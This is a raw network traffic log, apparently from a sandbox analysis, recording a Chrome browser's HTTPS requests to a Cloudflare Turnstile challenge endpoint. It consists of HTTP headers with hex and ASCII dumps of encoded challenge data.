                                                                                                                  2024-10-22 14:08:26 UTC467OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/to.css.map HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:26 UTC379INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:26 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 7
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  cf-chl-out: WQtxeiz/tPsdpW/6vWiiSNLfxwEB3ATeCUM=$tCu+PZbsHEDc5rJG
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f35bda33177-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:26 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                  Data Ascii: invalid


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  22192.168.2.1649742104.18.94.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:27 UTC467OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/to.css.map HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:27 UTC379INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:27 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 7
                                                                                                                  Connection: close
                                                                                                                  cf-chl-out: F+CaYjboDBC/QFE5/EpfnqDdx9mdvHj1jhY=$GJIJXGBFFxY9Fxch
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f3a6ef56b41-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:27 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                  Data Ascii: invalid


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  23192.168.2.1649744104.18.94.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:28 UTC1151OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1571854637:1729602840:zvAtmTzhVMvcARSqZmG29O5V7h_Ph-feXgeguOMcDwY/8d6a0f0a98ece91e/bPN.remb.Z21oUkjCBQn607MW.5p7.j.runcpLO0s2k-1729606099-1.1.1.1-FxUbwo9qxrp3t45.o_DKYNcB3r6oK8pT8DAgKZ3z4VycwCeNNToDarphnbHVhIU. HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 32639
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  CF-Challenge: bPN.remb.Z21oUkjCBQn607MW.5p7.j.runcpLO0s2k-1729606099-1.1.1.1-FxUbwo9qxrp3t45.o_DKYNcB3r6oK8pT8DAgKZ3z4VycwCeNNToDarphnbHVhIU.
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:28 UTC16384OUTData Raw: 76 5f 38 64 36 61 30 66 30 61 39 38 65 63 65 39 31 65 3d 41 70 48 24 4f 53 4d 64 59 43 48 55 48 55 64 6e 50 4d 4f 76 45 63 6a 76 4a 76 4b 24 7a 52 4d 6a 4d 44 76 6e 24 31 67 4d 35 76 63 45 6f 53 65 4d 49 76 43 57 48 6a 64 6f 76 72 6a 53 24 46 52 55 75 76 35 48 49 67 24 24 76 33 24 63 7a 6a 31 6a 76 6a 6a 76 70 24 4d 7a 76 44 24 4d 56 7a 2d 65 4c 6f 76 50 76 50 6f 6e 54 75 7a 53 77 50 64 76 79 4a 67 6d 4d 6e 38 24 63 6d 59 76 56 67 70 4d 73 76 55 70 47 76 6a 24 74 24 24 76 6e 63 76 6e 72 48 61 37 66 57 6e 24 76 73 4a 39 69 45 36 37 64 70 59 52 76 6c 67 70 47 6a 34 6a 51 64 74 44 66 45 4f 49 72 6d 4e 48 48 47 48 51 6a 78 61 52 76 55 36 48 76 6e 77 6d 70 70 66 34 67 74 31 24 48 70 39 25 32 62 64 6b 6d 38 63 76 43 59 34 34 74 73 36 4e 6f 32 41 74 6f 38 66 48
                                                                                                                  Data Ascii: v_8d6a0f0a98ece91e=ApH$OSMdYCHUHUdnPMOvEcjvJvK$zRMjMDvn$1gM5vcEoSeMIvCWHjdovrjS$FRUuv5HIg$$v3$czj1jvjjvp$MzvD$MVz-eLovPvPonTuzSwPdvyJgmMn8$cmYvVgpMsvUpGvj$t$$vncvnrHa7fWn$vsJ9iE67dpYRvlgpGj4jQdtDfEOIrmNHHGHQjxaRvU6Hvnwmppf4gt1$Hp9%2bdkm8cvCY44ts6No2Ato8fH
                                                                                                                  2024-10-22 14:08:28 UTC16255OUTData Raw: 77 78 2b 2d 41 4c 44 57 30 48 4d 75 76 52 24 69 51 75 59 63 59 76 6a 76 37 70 36 66 61 6d 53 65 76 68 74 6e 50 35 4a 76 43 76 73 6d 24 55 76 33 76 6e 52 76 53 76 6f 24 43 24 76 69 76 6c 2d 61 48 6e 47 76 50 6d 53 76 76 72 76 5a 24 61 59 76 46 76 56 24 4d 6d 6e 50 76 2d 70 48 70 76 48 55 76 59 48 67 4d 74 76 48 76 6a 49 69 65 52 73 24 61 70 4d 24 76 66 48 7a 6f 55 68 76 56 76 79 6f 6a 67 4d 32 76 56 6f 55 67 4d 4b 76 64 44 70 76 6f 4e 76 6f 5a 4b 2d 4d 36 76 74 6f 55 53 7a 68 74 43 38 53 67 76 2b 76 4d 4f 70 69 24 44 69 76 76 4d 65 72 71 76 48 6a 44 74 30 79 6a 2d 76 69 24 6e 52 53 48 55 6c 67 49 65 63 48 55 66 4d 59 24 6f 56 24 69 24 47 7a 4d 48 63 6a 76 75 24 6f 59 63 47 4d 53 53 63 48 55 36 76 6a 59 76 24 53 7a 76 54 24 72 65 53 64 52 74 24 72 48 63 73
                                                                                                                  Data Ascii: wx+-ALDW0HMuvR$iQuYcYvjv7p6famSevhtnP5JvCvsm$Uv3vnRvSvo$C$vivl-aHnGvPmSvvrvZ$aYvFvV$MmnPv-pHpvHUvYHgMtvHvjIieRs$apM$vfHzoUhvVvyojgM2vVoUgMKvdDpvoNvoZK-M6vtoUSzhtC8Sgv+vMOpi$DivvMerqvHjDt0yj-vi$nRSHUlgIecHUfMY$oV$i$GzMHcjvu$oYcGMSScHU6vjYv$SzvT$reSdRt$rHcs
                                                                                                                  2024-10-22 14:08:28 UTC330INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:28 GMT
                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                  Content-Length: 26320
                                                                                                                  Connection: close
                                                                                                                  cf-chl-gen: TIFY3mthLX6vZzHQhyazUn2XFU+Had3CU6nnRy5gR8fHVjllokRWKd0TSyOEXblTvim82SnpPlyHuFeb$0rGTlrlhe0t4wZvi
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f4228d9485c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:28 UTC1039INData Raw: 6c 71 2b 51 74 4a 32 6e 6d 4a 2b 6e 77 4a 69 68 72 61 2b 38 76 71 69 4e 6c 72 53 72 70 4e 57 34 72 36 69 72 30 36 36 73 75 36 43 38 77 64 48 5a 36 75 4b 36 33 2b 76 43 32 4e 6d 71 37 63 4c 43 72 74 43 33 30 73 7a 55 30 2f 4c 55 37 74 2f 38 30 51 53 36 76 74 62 77 78 50 58 42 42 67 48 6b 44 73 33 34 37 2b 54 4b 45 67 72 69 47 41 49 52 35 2f 48 57 31 75 37 64 33 42 44 65 34 75 45 51 33 42 49 45 39 43 6b 6d 42 43 6f 4e 42 79 72 74 2f 43 51 6c 4e 41 73 33 4d 51 38 7a 4a 52 73 55 50 42 55 4c 4b 76 6b 43 2b 53 5a 44 42 68 4d 58 41 52 55 4d 4f 42 38 58 50 6a 34 67 55 43 49 30 51 79 30 7a 53 6b 35 46 45 6a 4e 50 46 78 49 72 54 6b 51 68 59 57 46 56 4a 54 78 54 61 6a 56 6e 54 30 31 4a 5a 6c 70 6e 55 57 42 57 56 55 6b 30 5a 54 67 34 61 58 74 4c 57 6e 70 32 50 32 4e
                                                                                                                  Data Ascii: lq+QtJ2nmJ+nwJihra+8vqiNlrSrpNW4r6ir066su6C8wdHZ6uK63+vC2Nmq7cLCrtC30szU0/LU7t/80QS6vtbwxPXBBgHkDs347+TKEgriGAIR5/HW1u7d3BDe4uEQ3BIE9CkmBCoNByrt/CQlNAs3MQ8zJRsUPBULKvkC+SZDBhMXARUMOB8XPj4gUCI0Qy0zSk5FEjNPFxIrTkQhYWFVJTxTajVnT01JZlpnUWBWVUk0ZTg4aXtLWnp2P2N
                                                                                                                  2024-10-22 14:08:28 UTC1369INData Raw: 70 70 37 43 57 70 63 75 52 32 62 61 36 30 4b 65 2f 75 35 6a 44 7a 74 48 58 35 39 37 67 78 61 4c 43 79 4d 33 58 78 75 6a 6b 76 74 33 74 73 39 47 33 30 37 48 57 31 2f 6a 6d 2f 75 72 56 33 4f 48 66 38 51 44 51 77 75 50 69 36 4f 66 63 35 50 30 46 35 66 7a 71 38 75 66 4e 79 50 6a 52 44 4e 63 55 32 39 73 4b 43 78 33 33 38 51 38 56 41 79 50 69 41 68 6f 61 46 42 6e 6c 2b 77 49 68 4a 51 38 46 42 68 66 77 47 50 67 30 37 44 51 5a 46 7a 2f 32 50 42 6e 36 48 77 49 68 50 42 77 38 47 51 55 64 47 53 64 47 48 45 34 78 4a 43 35 57 52 7a 42 5a 56 42 4a 56 4a 6a 68 57 55 47 46 63 47 6c 52 61 4e 57 45 39 4a 6c 52 41 62 47 52 41 58 47 31 5a 4b 57 31 67 4d 31 5a 45 63 32 77 31 62 57 39 61 65 6c 78 59 50 55 39 65 54 47 31 63 68 33 4a 78 68 58 4a 67 54 47 64 68 53 48 75 52 65 6f
                                                                                                                  Data Ascii: pp7CWpcuR2ba60Ke/u5jDztHX597gxaLCyM3Xxujkvt3ts9G307HW1/jm/urV3OHf8QDQwuPi6Ofc5P0F5fzq8ufNyPjRDNcU29sKCx338Q8VAyPiAhoaFBnl+wIhJQ8FBhfwGPg07DQZFz/2PBn6HwIhPBw8GQUdGSdGHE4xJC5WRzBZVBJVJjhWUGFcGlRaNWE9JlRAbGRAXG1ZKW1gM1ZEc2w1bW9aelxYPU9eTG1ch3JxhXJgTGdhSHuReo
                                                                                                                  2024-10-22 14:08:28 UTC1369INData Raw: 79 4a 57 73 7a 74 43 66 6e 62 75 64 6e 62 6e 6c 76 71 48 62 6f 64 66 64 76 65 75 33 7a 63 66 78 75 36 2f 4c 35 63 66 51 7a 2b 66 34 31 2f 7a 4d 36 76 76 62 38 64 50 73 34 76 6a 50 33 75 50 59 2f 65 58 72 37 50 6a 46 7a 73 37 39 38 77 51 51 31 51 55 58 2b 67 6f 46 42 66 33 6e 43 68 67 4c 33 53 44 77 46 52 30 53 35 67 51 71 42 66 6b 5a 36 77 63 61 4d 52 34 6f 49 51 51 32 38 79 34 79 39 79 34 49 4e 50 34 39 44 76 76 2b 2f 53 59 6c 4f 7a 52 43 51 68 4d 69 50 67 63 4f 4f 6a 49 77 4a 45 55 2b 53 43 78 4b 52 54 73 59 57 46 4a 63 48 44 64 4b 59 54 52 61 52 6a 52 45 47 6b 70 65 51 44 64 4f 50 57 4e 63 61 6d 70 44 53 6d 59 76 4e 6d 4e 69 62 32 59 32 58 6b 31 71 50 48 5a 36 51 48 4d 2b 58 46 71 46 64 55 52 2b 66 49 4a 4a 66 30 75 47 66 49 65 4a 6b 35 64 72 55 59 39
                                                                                                                  Data Ascii: yJWsztCfnbudnbnlvqHbodfdveu3zcfxu6/L5cfQz+f41/zM6vvb8dPs4vjP3uPY/eXr7PjFzs798wQQ1QUX+goFBf3nChgL3SDwFR0S5gQqBfkZ6wcaMR4oIQQ28y4y9y4INP49Dvv+/SYlOzRCQhMiPgcOOjIwJEU+SCxKRTsYWFJcHDdKYTRaRjREGkpeQDdOPWNcampDSmYvNmNib2Y2Xk1qPHZ6QHM+XFqFdUR+fIJJf0uGfIeJk5drUY9
                                                                                                                  2024-10-22 14:08:28 UTC1369INData Raw: 63 76 55 76 4c 4c 58 77 4b 66 53 32 37 76 42 35 38 54 45 71 63 37 76 77 38 6e 73 7a 4d 79 78 31 73 48 4c 30 66 58 36 31 4c 6e 65 37 39 50 5a 2f 63 36 2f 39 2b 4d 41 38 39 7a 62 7a 4e 37 4a 35 51 33 4e 30 68 51 51 42 52 58 33 34 2f 59 59 37 42 34 64 33 2f 44 38 44 53 49 6d 48 69 6a 76 4b 75 67 55 43 2b 58 74 4b 41 73 76 42 76 49 44 44 65 77 30 45 66 63 6e 41 77 59 4a 38 7a 66 33 4b 66 34 32 47 54 6b 56 2f 44 73 6f 50 6a 30 45 42 53 77 69 50 51 73 4b 4a 42 49 30 46 45 39 49 55 56 49 72 4e 68 77 36 47 45 42 4f 46 44 73 6b 4f 7a 39 46 59 79 59 32 56 6a 64 48 4c 57 56 61 51 6d 77 6c 62 46 46 50 64 33 5a 30 55 54 4e 57 57 6c 64 5a 50 58 35 54 4f 6f 4a 61 63 57 42 48 64 6c 74 43 6a 58 31 37 67 57 52 75 59 55 31 6c 59 57 2b 4f 5a 4a 5a 35 62 70 70 72 6d 6d 6d 4e
                                                                                                                  Data Ascii: cvUvLLXwKfS27vB58TEqc7vw8nszMyx1sHL0fX61Lne79PZ/c6/9+MA89zbzN7J5Q3N0hQQBRX34/YY7B4d3/D8DSImHijvKugUC+XtKAsvBvIDDew0EfcnAwYJ8zf3Kf42GTkV/DsoPj0EBSwiPQsKJBI0FE9IUVIrNhw6GEBOFDskOz9FYyY2VjdHLWVaQmwlbFFPd3Z0UTNWWldZPX5TOoJacWBHdltCjX17gWRuYU1lYW+OZJZ5bpprmmmN
                                                                                                                  2024-10-22 14:08:28 UTC1369INData Raw: 50 58 74 36 6e 58 31 4c 72 5a 35 39 72 75 72 4b 36 76 36 2b 6e 46 39 38 4f 36 33 4e 48 71 75 63 6f 41 32 75 4f 39 41 65 48 42 42 4f 48 56 79 74 6e 6f 41 51 4c 64 37 63 6e 6e 2b 2f 48 78 7a 4e 2f 77 2b 4e 45 61 7a 74 50 79 37 51 6f 52 38 76 7a 75 2f 67 58 78 49 41 50 37 44 43 62 6c 41 51 67 4f 4d 78 77 41 43 4f 30 70 37 2b 34 6f 45 67 6b 4b 4e 2f 6b 70 2b 68 73 36 2f 55 41 34 41 6a 6f 6a 47 51 74 43 52 52 30 6e 4c 6c 46 43 43 54 77 7a 4c 67 35 46 4c 31 67 37 4a 44 4e 66 46 6a 6b 70 59 31 55 2b 50 46 51 6d 4f 6a 67 7a 5a 53 70 41 53 44 74 65 51 47 45 2f 58 45 51 2f 61 56 68 4a 52 47 56 74 54 6c 64 50 56 55 70 4d 56 33 70 58 68 46 74 69 55 6c 4a 38 51 6d 46 6f 69 59 39 62 67 6c 74 65 58 57 2b 52 6d 47 70 69 61 34 39 6c 64 6e 75 66 64 48 78 37 6a 33 61 6d 63
                                                                                                                  Data Ascii: PXt6nX1LrZ59rurK6v6+nF98O63NHqucoA2uO9AeHBBOHVytnoAQLd7cnn+/HxzN/w+NEaztPy7QoR8vzu/gXxIAP7DCblAQgOMxwACO0p7+4oEgkKN/kp+hs6/UA4AjojGQtCRR0nLlFCCTwzLg5FL1g7JDNfFjkpY1U+PFQmOjgzZSpASDteQGE/XEQ/aVhJRGVtTldPVUpMV3pXhFtiUlJ8QmFoiY9bglteXW+RmGpia49ldnufdHx7j3amc
                                                                                                                  2024-10-22 14:08:28 UTC1369INData Raw: 74 75 4f 53 73 71 37 37 6a 36 2f 62 4a 30 38 6e 74 78 66 48 64 36 66 4c 59 7a 65 50 73 34 76 6a 55 37 2b 54 37 36 2b 7a 70 78 2b 76 35 37 4d 6a 7a 79 2f 4c 79 33 2b 34 4f 35 52 73 46 44 68 55 66 36 68 41 59 38 50 4d 41 39 76 67 43 47 43 41 46 38 78 37 39 4a 67 51 68 44 67 55 66 4a 4f 34 55 41 42 49 74 4e 69 51 5a 48 7a 59 61 47 6a 55 32 49 7a 41 6a 52 69 4d 69 50 79 67 74 4b 52 6f 42 4f 6a 38 4e 54 79 4a 4a 53 77 6b 68 4d 79 5a 62 4c 6b 31 55 4d 55 6c 53 57 57 49 75 57 6b 5a 53 57 30 45 32 54 46 56 4c 59 54 31 59 54 57 52 55 56 56 49 77 56 47 4a 56 4d 56 77 30 57 31 74 49 56 33 5a 53 61 31 4a 7a 56 33 39 52 64 30 46 36 59 48 32 45 68 31 75 41 69 59 70 4b 68 56 4b 54 65 48 47 52 56 47 74 2b 65 6d 68 75 66 31 71 61 66 5a 6d 5a 65 48 61 48 68 35 5a 6b 6a 48
                                                                                                                  Data Ascii: tuOSsq77j6/bJ08ntxfHd6fLYzePs4vjU7+T76+zpx+v57Mjzy/Ly3+4O5RsFDhUf6hAY8PMA9vgCGCAF8x79JgQhDgUfJO4UABItNiQZHzYaGjU2IzAjRiMiPygtKRoBOj8NTyJJSwkhMyZbLk1UMUlSWWIuWkZSW0E2TFVLYT1YTWRUVVIwVGJVMVw0W1tIV3ZSa1JzV39Rd0F6YH2Eh1uAiYpKhVKTeHGRVGt+emhuf1qafZmZeHaHh5ZkjH
                                                                                                                  2024-10-22 14:08:28 UTC1369INData Raw: 73 4d 44 41 35 62 54 49 79 4f 72 64 35 74 2f 75 76 4f 44 57 38 76 76 63 32 2f 63 41 38 74 37 36 79 66 37 61 2f 67 67 4f 79 51 50 51 46 2b 51 48 2b 66 54 6e 45 65 33 30 38 68 4c 78 39 4f 30 54 48 50 7a 7a 46 75 51 42 44 42 77 6b 42 66 67 66 45 67 30 43 49 79 77 55 37 53 67 4c 4b 77 6f 72 44 66 41 4b 4d 66 76 30 44 6a 51 57 4a 52 45 39 47 6a 4d 56 50 43 34 70 47 45 49 68 42 53 64 45 54 43 30 34 53 46 42 62 4b 6b 77 75 50 53 78 51 57 43 30 76 55 79 4a 58 4e 56 68 66 48 54 39 62 54 6b 30 38 59 6b 4a 4e 51 47 6c 47 56 55 56 6e 53 53 31 46 61 33 52 4a 53 57 39 69 57 57 52 30 5a 54 6c 54 64 34 42 6c 56 6e 70 4a 6a 31 74 2f 63 34 4e 68 67 34 78 78 5a 49 68 35 54 57 71 4f 62 6e 6c 6f 6c 58 4a 74 63 4a 56 68 63 46 36 58 69 6f 46 2f 6e 48 36 72 6b 4b 43 6f 67 47 71
                                                                                                                  Data Ascii: sMDA5bTIyOrd5t/uvODW8vvc2/cA8t76yf7a/ggOyQPQF+QH+fTnEe308hLx9O0THPzzFuQBDBwkBfgfEg0CIywU7SgLKworDfAKMfv0DjQWJRE9GjMVPC4pGEIhBSdETC04SFBbKkwuPSxQWC0vUyJXNVhfHT9bTk08YkJNQGlGVUVnSS1Fa3RJSW9iWWR0ZTlTd4BlVnpJj1t/c4Nhg4xxZIh5TWqObnlolXJtcJVhcF6XioF/nH6rkKCogGq
                                                                                                                  2024-10-22 14:08:28 UTC1369INData Raw: 66 48 4a 35 75 6e 73 2b 50 47 2f 2b 4d 48 31 77 76 72 2b 77 67 54 33 79 64 2f 68 2f 66 49 50 38 77 41 4b 7a 68 6a 35 31 52 66 37 42 2b 76 57 49 41 4c 64 48 77 51 52 48 42 49 6e 48 66 67 6a 2b 67 59 50 4c 75 77 6c 41 68 73 64 48 53 67 56 49 69 55 78 4b 77 63 73 48 7a 6f 34 47 69 4e 43 41 54 6b 57 4c 78 59 39 42 6a 6f 2b 50 41 55 33 4f 6a 31 4a 51 68 4a 48 53 79 52 51 52 69 73 73 57 30 56 54 58 7a 70 4e 48 6c 39 45 55 56 78 53 49 6c 30 35 56 7a 74 5a 50 31 34 72 59 43 77 73 56 47 4a 57 59 6b 5a 75 53 54 68 63 61 56 39 37 59 47 35 34 62 6b 4a 35 56 59 4e 58 64 6c 74 36 53 33 78 49 58 58 42 37 63 6e 35 69 69 6d 57 4c 65 48 70 72 6c 6d 75 49 66 46 68 73 67 6c 32 4f 63 70 70 31 64 59 69 55 69 47 52 34 6a 6d 71 72 6b 4a 79 51 62 48 2b 57 63 61 4b 47 72 6f 6d 37
                                                                                                                  Data Ascii: fHJ5uns+PG/+MH1wvr+wgT3yd/h/fIP8wAKzhj51Rf7B+vWIALdHwQRHBInHfgj+gYPLuwlAhsdHSgVIiUxKwcsHzo4GiNCATkWLxY9Bjo+PAU3Oj1JQhJHSyRQRissW0VTXzpNHl9EUVxSIl05VztZP14rYCwsVGJWYkZuSThcaV97YG54bkJ5VYNXdlt6S3xIXXB7cn5iimWLeHprlmuIfFhsgl2Ocpp1dYiUiGR4jmqrkJyQbH+WcaKGrom7


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  24192.168.2.1649745104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:29 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1571854637:1729602840:zvAtmTzhVMvcARSqZmG29O5V7h_Ph-feXgeguOMcDwY/8d6a0f0a98ece91e/bPN.remb.Z21oUkjCBQn607MW.5p7.j.runcpLO0s2k-1729606099-1.1.1.1-FxUbwo9qxrp3t45.o_DKYNcB3r6oK8pT8DAgKZ3z4VycwCeNNToDarphnbHVhIU. HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:29 UTC379INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:29 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 7
                                                                                                                  Connection: close
                                                                                                                  cf-chl-out: ZgevGx5pRXqTXWJ1xVZQVc9ikPO6sYF5hGA=$qwkkaRjapK9Ga6al
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f48fcdde589-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:29 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                  Data Ascii: invalid


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  25192.168.2.1649747104.18.94.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:31 UTC1151OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1571854637:1729602840:zvAtmTzhVMvcARSqZmG29O5V7h_Ph-feXgeguOMcDwY/8d6a0f0a98ece91e/bPN.remb.Z21oUkjCBQn607MW.5p7.j.runcpLO0s2k-1729606099-1.1.1.1-FxUbwo9qxrp3t45.o_DKYNcB3r6oK8pT8DAgKZ3z4VycwCeNNToDarphnbHVhIU. HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 35013
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  CF-Challenge: bPN.remb.Z21oUkjCBQn607MW.5p7.j.runcpLO0s2k-1729606099-1.1.1.1-FxUbwo9qxrp3t45.o_DKYNcB3r6oK8pT8DAgKZ3z4VycwCeNNToDarphnbHVhIU.
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:31 UTC16384OUTData Raw: 76 5f 38 64 36 61 30 66 30 61 39 38 65 63 65 39 31 65 3d 41 70 48 24 4f 53 4d 64 59 43 48 55 48 55 64 6e 50 4d 4f 76 45 63 6a 76 4a 76 4b 24 7a 52 4d 6a 4d 44 76 6e 24 31 67 4d 35 76 63 45 6f 53 65 4d 49 76 43 57 48 6a 64 6f 76 72 6a 53 24 46 52 55 75 76 35 48 49 67 24 24 76 33 24 63 7a 6a 31 6a 76 6a 6a 76 70 24 4d 7a 76 44 24 4d 56 7a 2d 65 4c 6f 76 50 76 50 6f 6e 54 75 7a 53 77 50 64 76 79 4a 67 6d 4d 6e 38 24 63 6d 59 76 56 67 70 4d 73 76 55 70 47 76 6a 24 74 24 24 76 6e 63 76 6e 72 48 61 37 66 57 6e 24 76 73 4a 39 69 45 36 37 64 70 59 52 76 6c 67 70 47 6a 34 6a 51 64 74 44 66 45 4f 49 72 6d 4e 48 48 47 48 51 6a 78 61 52 76 55 36 48 76 6e 77 6d 70 70 66 34 67 74 31 24 48 70 39 25 32 62 64 6b 6d 38 63 76 43 59 34 34 74 73 36 4e 6f 32 41 74 6f 38 66 48
                                                                                                                  Data Ascii: v_8d6a0f0a98ece91e=ApH$OSMdYCHUHUdnPMOvEcjvJvK$zRMjMDvn$1gM5vcEoSeMIvCWHjdovrjS$FRUuv5HIg$$v3$czj1jvjjvp$MzvD$MVz-eLovPvPonTuzSwPdvyJgmMn8$cmYvVgpMsvUpGvj$t$$vncvnrHa7fWn$vsJ9iE67dpYRvlgpGj4jQdtDfEOIrmNHHGHQjxaRvU6Hvnwmppf4gt1$Hp9%2bdkm8cvCY44ts6No2Ato8fH
